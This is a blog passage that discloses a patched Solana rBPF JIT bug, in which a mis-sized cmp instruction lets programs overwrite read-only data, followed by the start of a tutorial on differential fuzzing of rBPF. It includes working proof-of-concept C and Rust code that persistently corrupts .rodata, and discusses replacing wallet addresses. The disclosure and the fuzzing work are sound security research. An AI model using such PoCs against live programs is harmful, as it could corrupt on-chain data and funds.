After that last continue, we effectively execute until we hit the write access to our read-only section. Additionally, we can step backwards in the program until we find our faulty behaviour.

The watched memory is written to as a result of this X86 store instruction (as a reminder, we this is the branch for stxh). Seeing this emit_address_translation call above it, we can determine that that function likely handles the address translation and readonly checks.

Further inspection shows that emit_address_translation actually emits a call to… something:

emit_call(jit, TARGET_PC_TRANSLATE_MEMORY_ADDRESS + len.trailing_zeros() as usize + 4 * (access_type as usize))?;

Okay, so this is some kind of global offset for this JIT program to translate the memory address. By searching for TARGET_PC_TRANSLATE_MEMORY_ADDRESS elsewhere in the program, we find a loop which initialises different kinds of memory translations.

Scrolling through this, we find our access check:

X86Instruction::cmp_immediate(OperandSize::S8, RAX, 0, Some(X86IndirectAccess::Offset(25))).emit(self)?; // region.is_writable == 0

Okay – so the x86 cmp instruction to find is one that uses a destination of [rax+0x19]. A couple rsi later to find such an instruction and we find:

cmp    DWORD PTR [rax+0x19], 0x0

Which is, notably, not using an 8-bit operand as the cmp_immediate call suggests. So what’s going on here?

x86 cmp operand size woes

Here is the definition of X86Instruction::cmp_immediate:

pub fn cmp_immediate(
    size: OperandSize,
    destination: u8,
    immediate: i64,
    indirect: Option<X86IndirectAccess>,
) -> Self {
    Self {
        size,
        opcode: 0x81,
        first_operand: RDI,
        second_operand: destination,
        immediate_size: OperandSize::S32,
        immediate,
        indirect,
        ..Self::default()
    }
}

This creates an x86 instruction with the opcode 0x81. Inspecting closer and cross-referencing with an x86-64 opcode reference, you can find that opcode 0x81 is only defined for 16-, 32-, and 64-bit register operands. If you want to use an 8-bit register operand, you’ll need to use the 0x80 opcode variant.

This is precisely the patch applied.

A quick side note about testing code with different compilers

This bug actually was a bit weirder than it seems at first. Due to differences in Rust struct padding between versions, at the time that I reported the bug, the difference was spurious in stable release. As a result, it’s quite likely that no one would have noticed the bug until the next Rust release version.

From my report:

It is likely that this bug was not discovered earlier due to inconsistent behaviour between various versions of Rust. During testing, it was found that stable release did not consistently have non-zero field padding where stable debug, nightly debug, and nightly release did.

Proof of concept

Alright, now to create a PoC so that the people inspecting the bug can validate it. Like last time, we’ll create an ELF, along with a few different demonstrations of the effects of the bug. Specifically, we want to demonstrate that read-only values in the BPF target can be modified persistently, as our writes affect the executable and thus all future executions of the JIT program.

value_in_ro.c

This program should fail, as the data to be overwritten should be read-only. It will be executed by howdy.rs.

typedef unsigned char uint8_t;
typedef unsigned long int uint64_t;

extern void log(const char*, uint64_t);

static const char data[] = "howdy";

extern uint64_t entrypoint(const uint8_t *input) {
  log(data, 5);
  char *overwritten = (char *)data;
  overwritten[0] = 'e';
  overwritten[1] = 'v';
  overwritten[2] = 'i';
  overwritten[3] = 'l';
  overwritten[4] = '!';
  log(data, 5);

  return 0;
}
howdy.rs

This program loads the compiled version of value_in_ro.c and attaches a log syscall so that we can see the behaviour internally. I confirmed that this syscall did not affect the runtime behaviour.

use std::collections::BTreeMap;
use std::fs::File;
use std::io::Read;
use solana_rbpf::{
    elf::Executable,
    insn_builder::{
        BpfCode,
        Instruction,
        IntoBytes,
        MemSize,
    },
    user_error::UserError,
    verifier::check,
    vm::{Config, EbpfVm, SyscallRegistry, TestInstructionMeter},
};
use solana_rbpf::elf::register_bpf_function;
use solana_rbpf::error::UserDefinedError;
use solana_rbpf::static_analysis::Analysis;
use solana_rbpf::vm::{InstructionMeter, SyscallObject};

fn main() {
    let config = Config {
        enable_instruction_tracing: true,
        ..Config::default()
    };
    let mut jit_mem = vec![0; 32];
    let mut elf = Vec::new();
    File::open("tests/elfs/value_in_ro.so").unwrap().read_to_end(&mut elf);
    let mut syscalls = SyscallRegistry::default();
    syscalls.register_syscall_by_name(b"log", solana_rbpf::syscalls::BpfSyscallString::call);
    let mut executable = Executable::<UserError, TestInstructionMeter>::from_elf(&elf, Some(check), config, syscalls).unwrap();
    assert!(Executable::jit_compile(&mut executable).is_ok());
    for _ in 0..4 {
        let jit_res = {
            let mut jit_vm = EbpfVm::<UserError, TestInstructionMeter>::new(&executable, &mut [], &mut jit_mem).unwrap();
            let mut jit_meter = TestInstructionMeter { remaining: 1 << 18 };
            let res = jit_vm.execute_program_jit(&mut jit_meter);
            res
        };
        eprintln!("{} => {:?}", 1, jit_res);
    }
}

This program, when executed, has the following output:

howdy
evil!
evil!
evil!
evil!
evil!
evil!
evil!

These first two files demonstrate the ability to overwrite the readonly data present in binaries persistently. Notice that we actually execute the JIT’d code multiple times, yet our changes to the value in data are persistent.

Implications

Suppose that there was a faulty offset or a user-controlled offset present in a BPF-based on-chain program. A malicious user could modify the readonly data of the program to replace certain contexts. In the best case scenario, this might lead to DoS of the program. In the worst case, this could lead to the replacement of fund amounts, of wallet addresses, etc.

Reporting

Having assembled my proof-of-concepts, my implications, and so on, I sent in the following report to Solana on February 4th:

Report for bug 2 as submitted to Solana

An incorrectly sized memory operand emitted by src/jit.rs:1490 may lead to .rodata section corruption due to an incorrect is_writable check. The cmp emitted is cmp DWORD PTR [rax+0x19], 0x0. As a result, when the uninitialised data present in the field padding of MemoryRegion is non-zero, the comparison will fail and assume that the section is writable. The data which is overwritten is persistent during the lifetime of the Executable instance as the data overwritten is in Executable.ro_section and thus affects future executions of the program without recompilation.

It is likely that this bug was not discovered earlier due to inconsistent behaviour between various versions of Rust. During testing, it was found that stable release did not consistently have non-zero field padding where stable debug, nightly debug, and nightly release did.

The first attack scenario where this vulnerability may be leveraged is in corruption of believed read-only data; see value_in_ro.{c,so} (intended to be placed within tests/elfs/) as an example of this behaviour. The example provided is contrived, but in scenarios where BPF programs do not correctly sanitise offsets in input, it may be possible for remote attackers to craft payloads which corrupt data within the .rodata section and thus replace secrets, operational data, etc. In the worst case, this may include replacement of critical data such as fixed wallet addresses for the lifetime of the Executable instance, which may be many executions. To test this behaviour, refer to howdy.rs (intended to be placed within examples/). If you find that corruption behaviour does not appear, try using a different optimisation level or compiler.

The second attack scenario is in corruption of BPF source code, which poisons future analysis and compilation. In the worst case (which is probably not a valid scenario), if the Executable is erroneously JIT compiled a second time after being executed in JIT once, the JIT compilation may emit unchecked BPF instructions as the verifier used in from_elf/from_text_bytes is not used per-compilation. Analysis and tracing is similarly corrupted, which may be leveraged to obscure or misrepresent the instructions which were previously executed. An example of the latter is provided in analysis-corruption.rs (intended to be placed within examples/). If you find that corruption behaviour does not appear, try using a different optimisation level or compiler.

While this vulnerability is largely uncategorised by the security policy provided, due to the possibility of the corruption of believed read-only data, I propose that this vulnerability be categorised under Other Attacks or Safety Violations.

value_in_ro.c (.so available upon request)
typedef unsigned char uint8_t;
typedef unsigned long int uint64_t;

extern void log(const char*, uint64_t);

static const char data[] = "howdy";

extern uint64_t entrypoint(const uint8_t *input) {
  log(data, 5);
  char *overwritten = (char *)data;
  overwritten[0] = 'e';
  overwritten[1] = 'v';
  overwritten[2] = 'i';
  overwritten[3] = 'l';
  overwritten[4] = '!';
  log(data, 5);

  return 0;
}
analysis-corruption.rs
use std::collections::BTreeMap;

use solana_rbpf::elf::Executable;
use solana_rbpf::elf::register_bpf_function;
use solana_rbpf::insn_builder::BpfCode;
use solana_rbpf::insn_builder::Instruction;
use solana_rbpf::insn_builder::IntoBytes;
use solana_rbpf::insn_builder::MemSize;
use solana_rbpf::static_analysis::Analysis;
use solana_rbpf::user_error::UserError;
use solana_rbpf::verifier::check;
use solana_rbpf::vm::Config;
use solana_rbpf::vm::EbpfVm;
use solana_rbpf::vm::SyscallRegistry;
use solana_rbpf::vm::TestInstructionMeter;

fn main() {
    let config = Config {
        enable_instruction_tracing: true,
        ..Config::default()
    };
    let mut jit_mem = vec![0; 32];
    let mut bpf_functions = BTreeMap::new();
    register_bpf_function(&mut bpf_functions, 0, "entrypoint", true).unwrap();
    let mut code = BpfCode::default();
    code
        .load(MemSize::DoubleWord).set_dst(0).set_imm(0).push()
        .load(MemSize::Word).set_imm(1).push()
        .store(MemSize::DoubleWord).set_dst(0).set_off(0).set_imm(0).push()
        .exit().push();
    let prog = code.into_bytes();
    assert!(check(prog, &config).is_ok());
    let mut executable = Executable::<UserError, TestInstructionMeter>::from_text_bytes(prog, None, config, SyscallRegistry::default(), bpf_functions).unwrap();
    assert!(Executable::jit_compile(&mut executable).is_ok());
    let jit_res = {
        let mut jit_vm = EbpfVm::<UserError, TestInstructionMeter>::new(&executable, &mut [], &mut jit_mem).unwrap();
        let mut jit_meter = TestInstructionMeter { remaining: 1 << 18 };
        let res = jit_vm.execute_program_jit(&mut jit_meter);
        let jit_tracer = jit_vm.get_tracer();
        let analysis = Analysis::from_executable(&executable);
        let stderr = std::io::stderr();
        jit_tracer.write(&mut stderr.lock(), &analysis).unwrap();
        res
    };
    eprintln!("{} => {:?}", 1, jit_res);
}
howdy.rs
use std::fs::File;
use std::io::Read;

use solana_rbpf::elf::Executable;
use solana_rbpf::user_error::UserError;
use solana_rbpf::verifier::check;
use solana_rbpf::vm::Config;
use solana_rbpf::vm::EbpfVm;
use solana_rbpf::vm::SyscallObject;
use solana_rbpf::vm::SyscallRegistry;
use solana_rbpf::vm::TestInstructionMeter;

fn main() {
    let config = Config {
        enable_instruction_tracing: true,
        ..Config::default()
    };
    let mut jit_mem = vec![0; 32];
    let mut elf = Vec::new();
    File::open("tests/elfs/value_in_ro.so").unwrap().read_to_end(&mut elf).unwrap();
    let mut syscalls = SyscallRegistry::default();
    syscalls.register_syscall_by_name(b"log", solana_rbpf::syscalls::BpfSyscallString::call).unwrap();
    let mut executable = Executable::<UserError, TestInstructionMeter>::from_elf(&elf, Some(check), config, syscalls).unwrap();
    assert!(Executable::jit_compile(&mut executable).is_ok());
    for _ in 0..4 {
        let jit_res = {
            let mut jit_vm = EbpfVm::<UserError, TestInstructionMeter>::new(&executable, &mut [], &mut jit_mem).unwrap();
            let mut jit_meter = TestInstructionMeter { remaining: 1 << 18 };
            let res = jit_vm.execute_program_jit(&mut jit_meter);
            res
        };
        eprintln!("{} => {:?}", 1, jit_res);
    }
}

The bug was patched in a mere 4 hours.

Solana classified this bug as a Denial-of-Service (Non-RPC) and awarded $100k. I disagreed strongly with this classification, but Solana said that due to the low likelihood of the exploitation of this bug (requiring a vulnerability in the on-chain program) they would offer $100k instead of the originally suggested $1m or $400k. They would not move on this point.

However, I would offer that (was that the actually basis for bug classification) that they should update their Security Policy to reflect that meaning. It was obviously very disappointing to hear that they would not be offering the bounty I expected given the classification categories provided.

Okay, so what’d you do with the money??

It would be bad form of me to not explain the incredible flexibility shown by Solana in terms of how they handled my payout. I intended to donate the funds to the Texas A&M Cybersecurity Club, at which I gained a lot of the skills necessary to perform this research and these exploits, and Solana was very willing to sidestep their listed policy and donate the funds directly in USD rather than making me handle the tokens on my own, which would have dramatically affected how much I could have donated due to tax. So, despite my concerns regarding their policy, I was very pleased with their willingness to accommodate my wishes with the bounty payout.

Earn $200K by fuzzing for a weekend: Part 1

By: addison
11 May 2022 at 07:00

By applying well-known fuzzing techniques to a popular target, I found several bugs that in total yielded over $200K in bounties. In this article I will demonstrate how powerful fuzzing can be when applied to software which has not yet faced sufficient testing.

If you’re here just for the bug disclosures, see Part 2, though I encourage you all, even those who have not yet tried their hand at fuzzing, to read through this.

Exposition

A few friends and I ran a little Discord server (now a Matrix space) which in which we discussed security and vulnerability research techniques. One of the things we have running in the server is a bot which posts every single CVE as they come out. And, yeah, I read a lot of them.

One day, the bot posted something that caught my eye:

This marks the beginning of our timeline: January 28th. I had noticed this CVE in particular for two reasons:

  • it was BPF, which I find to be an absurdly cool concept as it’s used in the Linux kernel (a JIT compiler in the kernel!!! what!!!)
  • it was a JIT compiler written in Rust

This CVE showed up almost immediately after I had developed some relatively intensive fuzzing for some of my own Rust software (specifically, a crate for verifying sokoban solutions where I had observed similar issues and thought “that looks familiar”).

Knowing what I had learned from my experience fuzzing my own software and that bugs in Rust programs could be quite easily found with the combo of cargo fuzz and arbitrary, I thought: “hey, why not?”.

The Target, and figuring out how to test it

Solana, as several of you likely know, “is a decentralized blockchain built to enable scalable, user-friendly apps for the world”. They primarily are known for their cryptocurrency, SOL, but also are a blockchain which operates really any form of smart contract.

rBPF in particular is a self-described “Rust virtual machine and JIT compiler for eBPF programs”. Notably, it implements both an interpreter and a JIT compiler for BPF programs. In other words: two different implementations of the same program, which theoretically exhibited the same behaviour when executed.

I was lucky enough to both take a software testing course in university and to have been part of a research group doing fuzzing (admittedly, we were fuzzing hardware, not software, but the concepts translate). A concept that I had hung onto in particular is the idea of test oracles – a way to distinguish what is “correct” behaviour and what is not in a design under test.

In particular, something that stood out to me about the presence of both an interpreter and a JIT compiler in rBPF is that we, in effect, had a perfect pseudo-oracle; as Wikipedia puts it:

a separately written program which can take the same input as the program or system under test so that their outputs may be compared to understand if there might be a problem to investigate.

Those of you who have more experience in fuzzing will recognise this concept as differential fuzzing, but I think we can often overlook that differential fuzzing is just another face of a pseudo-oracle.

In this particular case, we can execute the interpreter, one implementation of rBPF, and then execute the JIT compiled version, another implementation, with the same inputs (i.e., memory state, entrypoint, code, etc.) and see if their outputs are different. If they are, one of them must necessarily be incorrect per the description of the rBPF crate: two implementations of exactly the same behaviour.

Writing a fuzzer

To start off, let’s try to throw a bunch of inputs at it without really tuning to anything in particular. This allows us to sanity check that our basic fuzzing implementation actually works as we expect.

The dumb fuzzer

First, we need to figure out how to execute the interpreter. Thankfully, there are several examples of this readily available in a variety of tests. I referenced the test_interpreter_and_jit macro present in ubpf_execution.rs as the basis for how my so-called “dumb” fuzzer executes.

I’ve provided a sequence of components you can look at one chunk at a time before moving onto the whole fuzzer. Just click on the dropdowns to view the code relevant to that step. You don’t necessarily need to to understand the point of this post.

Step 1: Defining our inputs

We must define our inputs such that it’s actually useful for our fuzzer. Thankfully, arbitrary makes it near trivial to derive an input from raw bytes.

#[derive(arbitrary::Arbitrary, Debug)]
struct DumbFuzzData {
    template: ConfigTemplate,
    prog: Vec<u8>,
    mem: Vec<u8>,
}

If you want to see the definition of ConfigTemplate, you can check it out in common.rs, but all you need to know is that its purpose is to test the interpreter under a variety of different execution configurations. It’s not particularly important to understand the fundamental bits of the fuzzer.

Step 2: Setting up the VM

Setting up the fuzz target and the VM comes next. This will allow us to not only execute our test, but later to actually check if the behaviour is correct.

fuzz_target!(|data: DumbFuzzData| {
    let prog = data.prog;
    let config = data.template.into();
    if check(&prog, &config).is_err() {
        // verify please
        return;
    }
    let mut mem = data.mem;
    let registry = SyscallRegistry::default();
    let mut bpf_functions = BTreeMap::new();
    register_bpf_function(&config, &mut bpf_functions, &registry, 0, "entrypoint").unwrap();
    let executable = Executable::<UserError, TestInstructionMeter>::from_text_bytes(
        &prog,
        None,
        config,
        SyscallRegistry::default(),
        bpf_functions,
    )
    .unwrap();
    let mem_region = MemoryRegion::new_writable(&mut mem, ebpf::MM_INPUT_START);
    let mut vm =
        EbpfVm::<UserError, TestInstructionMeter>::new(&executable, &mut [], vec![mem_region]).unwrap();

    // TODO in step 3
});

You can find the details for how fuzz_target works from the Rust Fuzz Book which goes over how it works in higher detail than would be appropriate here.

Step 3: Executing our input and comparing output

In this step, we just execute the VM with our provided input. In future iterations, we’ll compare the output of interpreter vs JIT, but in this version, we’re just executing the interpreter to see if we can induce crashes.

fuzz_target!(|data: DumbFuzzData| {
    // see step 2 for this bit

    drop(black_box(vm.execute_program_interpreted(
        &mut TestInstructionMeter { remaining: 1024 },
    )));
});

I use black_box here but I’m not entirely convinced that it’s necessary. I added it to ensure that the result of the interpreted program’s execution isn’t simply discarded and thus the execution marked unnecessary, but I’m fairly certain it wouldn’t be regardless.

Note that we are not checking for if the execution failed here. If the BPF program fails: we don’t care! We only care if the VM crashes for any reason.

Step 4: Put it together

Below is the final code for the fuzzer, including all of the bits I didn’t show above for concision.

#![feature(bench_black_box)]
#![no_main]

use std::collections::BTreeMap;
use std::hint::black_box;

use libfuzzer_sys::fuzz_target;

use solana_rbpf::{
    ebpf,
    elf::{register_bpf_function, Executable},
    memory_region::MemoryRegion,
    user_error::UserError,
    verifier::check,
    vm::{EbpfVm, SyscallRegistry, TestInstructionMeter},
};

use crate::common::ConfigTemplate;

mod common;

#[derive(arbitrary::Arbitrary, Debug)]
struct DumbFuzzData {
    template: ConfigTemplate,
    prog: Vec<u8>,
    mem: Vec<u8>,
}

fuzz_target!(|data: DumbFuzzData| {
    let prog = data.prog;
    let config = data.template.into();
    if check(&prog, &config).is_err() {
        // verify please
        return;
    }
    let mut mem = data.mem;
    let registry = SyscallRegistry::default();
    let mut bpf_functions = BTreeMap::new();
    register_bpf_function(&config, &mut bpf_functions, &registry, 0, "entrypoint").unwrap();
    let executable = Executable::<UserError, TestInstructionMeter>::from_text_bytes(
        &prog,
        None,
        config,
        SyscallRegistry::default(),
        bpf_functions,
    )
    .unwrap();
    let mem_region = MemoryRegion::new_writable(&mut mem, ebpf::MM_INPUT_START);
    let mut vm =
        EbpfVm::<UserError, TestInstructionMeter>::new(&executable, &mut [], vec![mem_region]).unwrap();

    drop(black_box(vm.execute_program_interpreted(
        &mut TestInstructionMeter { remaining: 1024 },
    )));
});

Theoretically, an up-to-date version is available in the rBPF repo.

Evaluation

$ cargo +nightly fuzz run dumb -- -max_total_time=300
... snip ...
#2902510	REDUCE cov: 1092 ft: 2147 corp: 724/58Kb lim: 4096 exec/s: 9675 rss: 355Mb L: 134/3126 MS: 3 ChangeBit-InsertByte-PersAutoDict- DE: "\x07\xff\xff3"-
#2902537	REDUCE cov: 1092 ft: 2147 corp: 724/58Kb lim: 4096 exec/s: 9675 rss: 355Mb L: 60/3126 MS: 2 ChangeBinInt-EraseBytes-
#2905608	REDUCE cov: 1092 ft: 2147 corp: 724/58Kb lim: 4096 exec/s: 9685 rss: 355Mb L: 101/3126 MS: 1 EraseBytes-
#2905770	NEW    cov: 1092 ft: 2155 corp: 725/58Kb lim: 4096 exec/s: 9685 rss: 355Mb L: 61/3126 MS: 2 ShuffleBytes-CrossOver-
#2906805	DONE   cov: 1092 ft: 2155 corp: 725/58Kb lim: 4096 exec/s: 9657 rss: 355Mb
Done 2906805 runs in 301 second(s)

After executing the fuzzer, we can evaluate its effectiveness at finding interesting inputs by checking its coverage after executing for a given time (note the use of the -max_total_time flag). In this case, I want to determine just how well it covers the function which handles interpreter execution. To do so, I issue the following commands:

$ cargo +nightly fuzz coverage dumb
$ rust-cov show -Xdemangler=rustfilt fuzz/target/x86_64-unknown-linux-gnu/release/dumb -instr-profile=fuzz/coverage/dumb/coverage.profdata -show-line-counts-or-regions -name=execute_program_interpreted_inner
Command output of rust-cov

If you’re not familiar with llvm coverage output, the first column is the line number, the second column is the number of times that that particular line was hit, and the third column is the code itself.

<solana_rbpf::vm::EbpfVm<solana_rbpf::user_error::UserError, solana_rbpf::vm::TestInstructionMeter>>::execute_program_interpreted_inner:
  709|    763|    fn execute_program_interpreted_inner(
  710|    763|        &mut self,
  711|    763|        instruction_meter: &mut I,
  712|    763|        initial_insn_count: u64,
  713|    763|        last_insn_count: &mut u64,
  714|    763|    ) -> ProgramResult<E> {
  715|    763|        // R1 points to beginning of input memory, R10 to the stack of the first frame
  716|    763|        let mut reg: [u64; 11] = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, self.stack.get_frame_ptr()];
  717|    763|        reg[1] = ebpf::MM_INPUT_START;
  718|    763|
  719|    763|        // Loop on instructions
  720|    763|        let config = self.executable.get_config();
  721|    763|        let mut next_pc: usize = self.executable.get_entrypoint_instruction_offset()?;
                                                                                                  ^0
  722|    763|        let mut remaining_insn_count = initial_insn_count;
  723|   136k|        while (next_pc + 1) * ebpf::INSN_SIZE <= self.program.len() {
  724|   135k|            *last_insn_count += 1;
  725|   135k|            let pc = next_pc;
  726|   135k|            next_pc += 1;
  727|   135k|            let mut instruction_width = 1;
  728|   135k|            let mut insn = ebpf::get_insn_unchecked(self.program, pc);
  729|   135k|            let dst = insn.dst as usize;
  730|   135k|            let src = insn.src as usize;
  731|   135k|
  732|   135k|            if config.enable_instruction_tracing {
  733|      0|                let mut state = [0u64; 12];
  734|      0|                state[0..11].copy_from_slice(&reg);
  735|      0|                state[11] = pc as u64;
  736|      0|                self.tracer.trace(state);
  737|   135k|            }
  738|       |
  739|   135k|            match insn.opc {
  740|   135k|                _ if dst == STACK_PTR_REG && config.dynamic_stack_frames => {
  741|    361|                    match insn.opc {
  742|     16|                        ebpf::SUB64_IMM => self.stack.resize_stack(-insn.imm),
  743|    345|                        ebpf::ADD64_IMM => self.stack.resize_stack(insn.imm),
  744|       |                        _ => {
  745|       |                            #[cfg(debug_assertions)]
  746|      0|                            unreachable!("unexpected insn on r11")
  747|       |                        }
  748|       |                    }
  749|       |                }
  750|       |
  751|       |                // BPF_LD class
  752|       |                // Since this pointer is constant, and since we already know it (ebpf::MM_INPUT_START), do not
  753|       |                // bother re-fetching it, just use ebpf::MM_INPUT_START already.
  754|       |                ebpf::LD_ABS_B   => {
  755|      3|                    let vm_addr = ebpf::MM_INPUT_START.wrapping_add(insn.imm as u32 as u64);
  756|      3|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u8);
                                      ^0
  757|      0|                    reg[0] = unsafe { *host_ptr as u64 };
  758|       |                },
  759|       |                ebpf::LD_ABS_H   =>  {
  760|      3|                    let vm_addr = ebpf::MM_INPUT_START.wrapping_add(insn.imm as u32 as u64);
  761|      3|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u16);
                                      ^0
  762|      0|                    reg[0] = unsafe { *host_ptr as u64 };
  763|       |                },
  764|       |                ebpf::LD_ABS_W   => {
  765|      2|                    let vm_addr = ebpf::MM_INPUT_START.wrapping_add(insn.imm as u32 as u64);
  766|      2|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u32);
                                      ^0
  767|      0|                    reg[0] = unsafe { *host_ptr as u64 };
  768|       |                },
  769|       |                ebpf::LD_ABS_DW  => {
  770|      4|                    let vm_addr = ebpf::MM_INPUT_START.wrapping_add(insn.imm as u32 as u64);
  771|      4|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u64);
                                      ^0
  772|      0|                    reg[0] = unsafe { *host_ptr as u64 };
  773|       |                },
  774|       |                ebpf::LD_IND_B   => {
  775|      2|                    let vm_addr = ebpf::MM_INPUT_START.wrapping_add(reg[src]).wrapping_add(insn.imm as u32 as u64);
  776|      2|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u8);
                                      ^0
  777|      0|                    reg[0] = unsafe { *host_ptr as u64 };
  778|       |                },
  779|       |                ebpf::LD_IND_H   => {
  780|      3|                    let vm_addr = ebpf::MM_INPUT_START.wrapping_add(reg[src]).wrapping_add(insn.imm as u32 as u64);
  781|      3|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u16);
                                      ^0
  782|      0|                    reg[0] = unsafe { *host_ptr as u64 };
  783|       |                },
  784|       |                ebpf::LD_IND_W   => {
  785|      7|                    let vm_addr = ebpf::MM_INPUT_START.wrapping_add(reg[src]).wrapping_add(insn.imm as u32 as u64);
  786|      7|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u32);
                                      ^0
  787|      0|                    reg[0] = unsafe { *host_ptr as u64 };
  788|       |                },
  789|       |                ebpf::LD_IND_DW  => {
  790|      3|                    let vm_addr = ebpf::MM_INPUT_START.wrapping_add(reg[src]).wrapping_add(insn.imm as u32 as u64);
  791|      3|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u64);
                                      ^0
  792|      0|                    reg[0] = unsafe { *host_ptr as u64 };
  793|       |                },
  794|       |
  795|      0|                ebpf::LD_DW_IMM  => {
  796|      0|                    ebpf::augment_lddw_unchecked(self.program, &mut insn);
  797|      0|                    instruction_width = 2;
  798|      0|                    next_pc += 1;
  799|      0|                    reg[dst] = insn.imm as u64;
  800|      0|                },
  801|       |
  802|       |                // BPF_LDX class
  803|       |                ebpf::LD_B_REG   => {
  804|     18|                    let vm_addr = (reg[src] as i64).wrapping_add(insn.off as i64) as u64;
  805|     18|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u8);
                                      ^2
  806|      2|                    reg[dst] = unsafe { *host_ptr as u64 };
  807|       |                },
  808|       |                ebpf::LD_H_REG   => {
  809|     18|                    let vm_addr = (reg[src] as i64).wrapping_add(insn.off as i64) as u64;
  810|     18|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u16);
                                      ^6
  811|      6|                    reg[dst] = unsafe { *host_ptr as u64 };
  812|       |                },
  813|       |                ebpf::LD_W_REG   => {
  814|    365|                    let vm_addr = (reg[src] as i64).wrapping_add(insn.off as i64) as u64;
  815|    365|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u32);
                                      ^348
  816|    348|                    reg[dst] = unsafe { *host_ptr as u64 };
  817|       |                },
  818|       |                ebpf::LD_DW_REG  => {
  819|     15|                    let vm_addr = (reg[src] as i64).wrapping_add(insn.off as i64) as u64;
  820|     15|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u64);
                                      ^5
  821|      5|                    reg[dst] = unsafe { *host_ptr as u64 };
  822|       |                },
  823|       |
  824|       |                // BPF_ST class
  825|       |                ebpf::ST_B_IMM   => {
  826|     26|                    let vm_addr = (reg[dst] as i64).wrapping_add( insn.off as i64) as u64;
  827|     26|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Store, pc, u8);
                                      ^20
  828|     20|                    unsafe { *host_ptr = insn.imm as u8 };
  829|       |                },
  830|       |                ebpf::ST_H_IMM   => {
  831|     23|                    let vm_addr = (reg[dst] as i64).wrapping_add(insn.off as i64) as u64;
  832|     23|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Store, pc, u16);
                                      ^13
  833|     13|                    unsafe { *host_ptr = insn.imm as u16 };
  834|       |                },
  835|       |                ebpf::ST_W_IMM   => {
  836|     12|                    let vm_addr = (reg[dst] as i64).wrapping_add(insn.off as i64) as u64;
  837|     12|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Store, pc, u32);
                                      ^5
  838|      5|                    unsafe { *host_ptr = insn.imm as u32 };
  839|       |                },
  840|       |                ebpf::ST_DW_IMM  => {
  841|     17|                    let vm_addr = (reg[dst] as i64).wrapping_add(insn.off as i64) as u64;
  842|     17|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Store, pc, u64);
                                      ^11
  843|     11|                    unsafe { *host_ptr = insn.imm as u64 };
  844|       |                },
  845|       |
  846|       |                // BPF_STX class
  847|       |                ebpf::ST_B_REG   => {
  848|     17|                    let vm_addr = (reg[dst] as i64).wrapping_add(insn.off as i64) as u64;
  849|     17|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Store, pc, u8);
                                      ^3
  850|      3|                    unsafe { *host_ptr = reg[src] as u8 };
  851|       |                },
  852|       |                ebpf::ST_H_REG   => {
  853|     13|                    let vm_addr = (reg[dst] as i64).wrapping_add(insn.off as i64) as u64;
  854|     13|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Store, pc, u16);
                                      ^3
  855|      3|                    unsafe { *host_ptr = reg[src] as u16 };
  856|       |                },
  857|       |                ebpf::ST_W_REG   => {
  858|     19|                    let vm_addr = (reg[dst] as i64).wrapping_add(insn.off as i64) as u64;
  859|     19|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Store, pc, u32);
                                      ^7
  860|      7|                    unsafe { *host_ptr = reg[src] as u32 };
  861|       |                },
  862|       |                ebpf::ST_DW_REG  => {
  863|      8|                    let vm_addr = (reg[dst] as i64).wrapping_add(insn.off as i64) as u64;
  864|      8|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Store, pc, u64);
                                      ^2
  865|      2|                    unsafe { *host_ptr = reg[src] as u64 };
  866|       |                },
  867|       |
  868|       |                // BPF_ALU class
  869|  1.06k|                ebpf::ADD32_IMM  => reg[dst] = (reg[dst] as i32).wrapping_add(insn.imm as i32)   as u64,
  870|    695|                ebpf::ADD32_REG  => reg[dst] = (reg[dst] as i32).wrapping_add(reg[src] as i32)   as u64,
  871|    710|                ebpf::SUB32_IMM  => reg[dst] = (reg[dst] as i32).wrapping_sub(insn.imm as i32)   as u64,
  872|    345|                ebpf::SUB32_REG  => reg[dst] = (reg[dst] as i32).wrapping_sub(reg[src] as i32)   as u64,
  873|  1.03k|                ebpf::MUL32_IMM  => reg[dst] = (reg[dst] as i32).wrapping_mul(insn.imm as i32)   as u64,
  874|  2.07k|                ebpf::MUL32_REG  => reg[dst] = (reg[dst] as i32).wrapping_mul(reg[src] as i32)   as u64,
  875|  1.03k|                ebpf::DIV32_IMM  => reg[dst] = (reg[dst] as u32 / insn.imm as u32)               as u64,
  876|       |                ebpf::DIV32_REG  => {
  877|      4|                    if reg[src] as u32 == 0 {
  878|      2|                        return Err(EbpfError::DivideByZero(pc + ebpf::ELF_INSN_DUMP_OFFSET));
  879|      2|                    }
  880|      2|                    reg[dst] = (reg[dst] as u32 / reg[src] as u32) as u64;
  881|       |                },
  882|       |                ebpf::SDIV32_IMM  => {
  883|    346|                    if reg[dst] as i32 == i32::MIN && insn.imm == -1 {
                                                                    ^0
  884|      0|                        return Err(EbpfError::DivideOverflow(pc + ebpf::ELF_INSN_DUMP_OFFSET));
  885|    346|                    }
  886|    346|                    reg[dst] = (reg[dst] as i32 / insn.imm as i32) as u64;
  887|       |                }
  888|       |                ebpf::SDIV32_REG  => {
  889|     13|                    if reg[src] as i32 == 0 {
  890|      2|                        return Err(EbpfError::DivideByZero(pc + ebpf::ELF_INSN_DUMP_OFFSET));
  891|     11|                    }
  892|     11|                    if reg[dst] as i32 == i32::MIN && reg[src] as i32 == -1 {
                                                                    ^0
